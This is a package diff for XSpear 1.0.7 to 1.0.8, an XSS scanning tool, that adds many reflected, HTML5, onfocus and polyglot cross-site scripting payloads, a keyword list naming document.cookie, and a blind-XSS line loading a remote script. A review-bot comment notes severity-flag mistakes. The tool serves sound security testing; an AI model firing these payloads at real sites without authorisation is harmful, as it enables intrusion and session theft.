XSpear 1.0.7 → 1.0.8

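--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
  ---
  SHA256:
- metadata.gz: 0c0ac315484162b92f2f958d2ddc70736bec0f164349575529e763f154366c37
- data.tar.gz: eab6a1c2350ea1bf4467fcd41cfd00a61c58d1693503e4437ae86418e348bda1
+ metadata.gz: 6921327dc742a1fe07a1daf76f20272a50f5fc6d8ecd73bf4f2ef9eed6d0d98d
+ data.tar.gz: 3344443259fa53fe61fc57baefed0f81891e8badd048c9098c4c69a8b33ea1fe
  SHA512:
- metadata.gz: e4463bb21d6b1cf918c290d7a3540d93510f4f9cb68ebc6fad7319377d579228aa754b832e5d077f63e24b35d2ea73fa492a4a21351c0f26880b6c1f52065016
- data.tar.gz: bf64aa0df617fdddfb8d07803a8dbba0bb2822579b56fbc93a0d17f73aced699ad2f46bfd01a51ae9e614d3287b016e2419eaba35384e17d76c038c3ea52d567
+ metadata.gz: da21a77b8132168cf8068f7cde102b4dac72d332db5a62f75fff701d258ef3e636fdcabfaabee1ecc159f5b7fb5223b86016ce59264fdee6a104b1f6725d01da
+ data.tar.gz: c1bcef3a187eef64530b717527316f6f674387de7eda895fa6420c6e3de5d0eff103ac9ef359162cc89c9d91a77f12af6c8d7ad47e857b5632794ce8eeb50f53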
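--- a/data/.idea/workspace.xml
+++ b/data/.idea/workspace.xml
@@ -3,10 +3,7 @@
  <component name="ChangeListManager">
  <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
  <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
- <change beforePath="$PROJECT_DIR$/README.md" beforeDir="false" afterPath="$PROJECT_DIR$/README.md" afterDir="false" />
  <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
- <change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
- <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
  </list>
  <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
  <option name="SHOW_DIALOG" value="false" />
@@ -36,20 +33,20 @@
  <provider selected="true" editor-type-id="text-editor" />
  </entry>
  </file>
- <file pinned="false" current-in-tab="false">
+ <file pinned="false" current-in-tab="true">
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
  <provider selected="true" editor-type-id="text-editor">
- <state relative-caret-position="426">
- <caret line="181" column="31" lean-forward="true" selection-start-line="181" selection-start-column="31" selection-end-line="181" selection-end-column="31" />
+ <state relative-caret-position="381">
+ <caret line="402" lean-forward="true" selection-start-line="402" selection-end-line="402" />
  </state>
  </provider>
  </entry>
  </file>
- <file pinned="false" current-in-tab="true">
+ <file pinned="false" current-in-tab="false">
  <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
  <provider selected="true" editor-type-id="text-editor">
- <state relative-caret-position="253">
- <caret line="41" column="29" selection-start-line="41" selection-start-column="29" selection-end-line="41" selection-end-column="29" />
+ <state relative-caret-position="-176">
+ <caret line="34" column="99" selection-start-line="34" selection-start-column="99" selection-end-line="34" selection-end-column="99" />
  </state>
  </provider>
  </entry>
@@ -114,12 +111,12 @@
  <option value="$PROJECT_DIR$/exe/XSpear" />
  <option value="$PROJECT_DIR$/README.md" />
  <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
- <option value="$PROJECT_DIR$/lib/XSpear.rb" />
  <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
+ <option value="$PROJECT_DIR$/lib/XSpear.rb" />
  </list>
  </option>
  </component>
- <component name="ProjectFrameBounds">
+ <component name="ProjectFrameBounds" fullScreen="true">
  <option name="x" value="-1920" />
  <option name="y" value="-620" />
  <option name="width" value="1920" />
@@ -230,7 +227,7 @@
  <workItem from="1562942816004" duration="15337000" />
  <workItem from="1563638656518" duration="4985000" />
  <workItem from="1563809961097" duration="4237000" />
- <workItem from="1563893538891" duration="3583000" />
+ <workItem from="1563893538891" duration="6879000" />
  </task>
  <task id="LOCAL-00001" summary="init update">
  <created>1562945899597</created>
@@ -498,14 +495,21 @@
  <option name="project" value="LOCAL" />
  <updated>1563896886094</updated>
  </task>
- <option name="localTasksCounter" value="39" />
+ <task id="LOCAL-00039" summary="(1.0.7) Releases 1.0.7 (Modify Format, etc..)">
+ <created>1563897379180</created>
+ <option name="number" value="00039" />
+ <option name="presentableId" value="LOCAL-00039" />
+ <option name="project" value="LOCAL" />
+ <updated>1563897379180</updated>
+ </task>
+ <option name="localTasksCounter" value="40" />
  <servers />
  </component>
  <component name="TimeTrackingManager">
- <option name="totallyTimeSpent" value="28142000" />
+ <option name="totallyTimeSpent" value="31438000" />
  </component>
  <component name="ToolWindowManager">
- <frame x="-1920" y="-620" width="1920" height="1057" extended-state="0" />
+ <frame x="-1920" y="-643" width="1920" height="1080" extended-state="0" />
  <editor active="true" />
  <layout>
  <window_info content_ui="combo" id="Project" order="0" visible="true" weight="0.16400427" />
@@ -521,7 +525,7 @@
  <window_info anchor="bottom" id="Docker" order="7" show_stripe_button="false" />
  <window_info anchor="bottom" id="Database Changes" order="8" />
  <window_info anchor="bottom" id="Version Control" order="9" />
- <window_info active="true" anchor="bottom" id="Terminal" order="10" visible="true" weight="0.29637307" />
+ <window_info active="true" anchor="bottom" id="Terminal" order="10" visible="true" weight="0.34158415" />
  <window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
  <window_info anchor="bottom" id="Messages" order="12" weight="0.32953367" />
  <window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
@@ -534,7 +538,6 @@
  <option name="version" value="1" />
  </component>
  <component name="VcsManagerConfiguration">
- <MESSAGE value="edit gem dependency(runtime, developement)" />
  <MESSAGE value="Add json report and new build binary, edit readme" />
  <MESSAGE value="Add screenshot images" />
  <MESSAGE value="Add dependency gems descriptions" />
@@ -559,7 +562,8 @@
  <MESSAGE value="(1.0.6)[fixed #5] Add blind-xss other pattern" />
  <MESSAGE value="(1.0.6) Releases 1.0.6 version" />
  <MESSAGE value="(1.0.6) Edit README.md" />
- <option name="LAST_COMMIT_MESSAGE" value="(1.0.6) Edit README.md" />
+ <MESSAGE value="(1.0.7) Releases 1.0.7 (Modify Format, etc..)" />
+ <option name="LAST_COMMIT_MESSAGE" value="(1.0.7) Releases 1.0.7 (Modify Format, etc..)" />
  </component>
  <component name="editorHistoryManager">
  <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -629,17 +633,17 @@
  </state>
  </provider>
  </entry>
- <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
  <provider selected="true" editor-type-id="text-editor">
- <state relative-caret-position="426">
- <caret line="181" column="31" lean-forward="true" selection-start-line="181" selection-start-column="31" selection-end-line="181" selection-end-column="31" />
+ <state relative-caret-position="-176">
+ <caret line="34" column="99" selection-start-line="34" selection-start-column="99" selection-end-line="34" selection-end-column="99" />
  </state>
  </provider>
  </entry>
- <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
+ <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
  <provider selected="true" editor-type-id="text-editor">
- <state relative-caret-position="253">
- <caret line="41" column="29" selection-start-line="41" selection-start-column="29" selection-end-line="41" selection-end-column="29" />
+ <state relative-caret-position="381">
+ <caret line="402" lean-forward="true" selection-start-line="402" selection-end-line="402" />
  </state>
  </provider>
  </entry>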
data/README.md CHANGED
@@ -134,7 +134,7 @@ __((_)(_)) /(/( /((_))(_))(()\
134
134
  |_| \ /<
135
135
  {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
136
136
  / \<
137
- \> [ v1.0.6 ]
137
+ \> [ v1.0.7 ]
138
138
  [*] creating a test query.
139
139
  [*] test query generation is complete. [149 query]
140
140
  [*] starting test and analysis. [10 threads]
@@ -297,5 +297,5 @@ The gem is available as open source under the terms of the [MIT License](https:/
297
297
  Everyone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/[USERNAME]/XSpear/blob/master/CODE_OF_CONDUCT.md).
298
298
 
299
299
  ## ScreenShot
300
- <img src="https://user-images.githubusercontent.com/13212227/61726530-bf7aff80-adac-11e9-9ed8-ac8ecd358c0c.png" width=100%>
300
+ <img src="https://user-images.githubusercontent.com/13212227/61727892-1681d400-adaf-11e9-832d-37547006f778.png" width=100%>
301
301
  <img src="https://user-images.githubusercontent.com/13212227/61311071-8b459300-a830-11e9-8e60-c08e984fdacb.png" width=100%>
@@ -1,3 +1,3 @@
1
1
  module XSpear
2
- VERSION = "1.0.7"
2
+ VERSION = "1.0.8"
3
3
  end
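--- a/data/lib/XSpear.rb
+++ b/data/lib/XSpear.rb
@@ -247,6 +247,7 @@ class XspearScan
  'onKeyUp',
  'onLayoutComplete',
  'onLoad',
+ 'onloadstart',
  'onLoseCapture',
  'onMediaComplete',
  'onMediaError',
@@ -297,7 +298,10 @@ class XspearScan
  'onTrackChange',
  'onUndo',
  'onUnload',
- 'onURLFlip'
+ 'onURLFlip',
+ 'ontouchstart',
+ 'ontouchend',
+ 'ontouchmove'
  ]
  tags = [
  "script",
@@ -308,10 +312,11 @@ class XspearScan
  "audio",
  "meta",
  "object",
- "embeded",
+ "embed",
  "style",
  "frame",
- "frameset"
+ "frameset",
+ "applet"
  ]
  special_chars =[
  ">",
@@ -335,6 +340,24 @@ class XspearScan
  "=",
  "$"
  ]
+ useful_code = [
+ "javascript:",
+ "JaVasCriPt:",
+ "jaVas%0dcRipt:",
+ "jaVas%0acRipt:",
+ "jaVas%09cRipt:",
+ "data:",
+ "alert(",
+ "alert`",
+ "prompt(",
+ "prompt`",
+ "confirm(",
+ "confirm`",
+ "document.location",
+ "document.cookie",
+ "window.location"
+ ]
+
 
  log('s', 'creating a test query.')
  r.push makeQueryPattern('s', '', '', 'i', "-", CallbackCheckHeaders)
@@ -357,17 +380,43 @@ class XspearScan
  end
 
  # Check Common XSS Payloads
+ onfocus_tags = [
+ "input",
+ "select",
+ "textarea",
+ "keygen"
+ ]
  r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
  r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
  r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
+ r.push makeQueryPattern('x', '"><scr<script>ipt>alert(45)</scr<script>ipt>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
  r.push makeQueryPattern('x', '"><iframe/src=JavaScriPt:alert(45)>', '"><iframe/src=JavaScriPt:alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
+ r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+ r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert`45`">', '<details/open/ontoggle="alert`45`">', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+ r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+ r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+ r.push makeQueryPattern('x', '"\'><meter value=2 min=0 max=10 onmouseover=alert(45)>2 out of 10</meter>', '<meter value=2 min=0 max=10 onmouseover=alert(45)>2 out of 10</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+
+ onfocus_tags.each do |t|
+ r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
+ end
+
+ # Check Selenium Payloads
  r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered "+"<script>alert(45)</script>".red, CallbackXSSSelenium)
+ r.push makeQueryPattern('x', '"><svg onload=alert(1)>', '<svg onload=alert(1)>', 'v', "triggered "+"<svg onload=alert(1)> (x0c)".red, CallbackXSSSelenium)
  r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered "+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
  r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
+ r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "triggered "+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
+ r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'h', "triggered "+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
+ r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "triggered "+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
+ r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "triggered "+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
+
+ # Check Selenium Polyglot
  r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
  r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
  r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
 
+
  # Check Blind XSS Payload
  if !@blind_url.nil?
  r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "NOTDETECTED", 'i', "", CallbackNotAdded)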
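Review bot: The four entries added under `# Check Selenium Payloads` (video, details, audio, marquee) pass `'h'` as the fourth argument together with `CallbackXSSSelenium`, while every other Selenium-verified entry in this block passes `'v'`. This looks like a leftover from copying the string-match lines above, so browser-confirmed findings would presumably be reported at the lower level; the argument should read `'v'`, e.g. `..., 'v', "triggered "+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)`. The added `<svg onload=alert(1)>` entry is also the only check that uses `alert(1)` instead of `alert(45)`, and its label says `(x0c)` although the visible string contains an ordinary space, so if the callback keys on the value 45 it can never confirm. The enclosing method and both callbacks lie outside these hunks, so the meaning of `'h'`/`'v'` and the matching logic are inferred and worth confirming against `makeQueryPattern`.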
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: XSpear
3
3
  version: !ruby/object:Gem::Version
4
- version: 1.0.7
4
+ version: 1.0.8
5
5
  platform: ruby
6
6
  authors:
7
7
  - hahwul
8
8
  autorequire:
9
9
  bindir: exe
10
10
  cert_chain: []
11
- date: 2019-07-23 00:00:00.000000000 Z
11
+ date: 2019-07-24 00:00:00.000000000 Z
12
12
  dependencies:
13
13
  - !ruby/object:Gem::Dependency
14
14
  name: colorize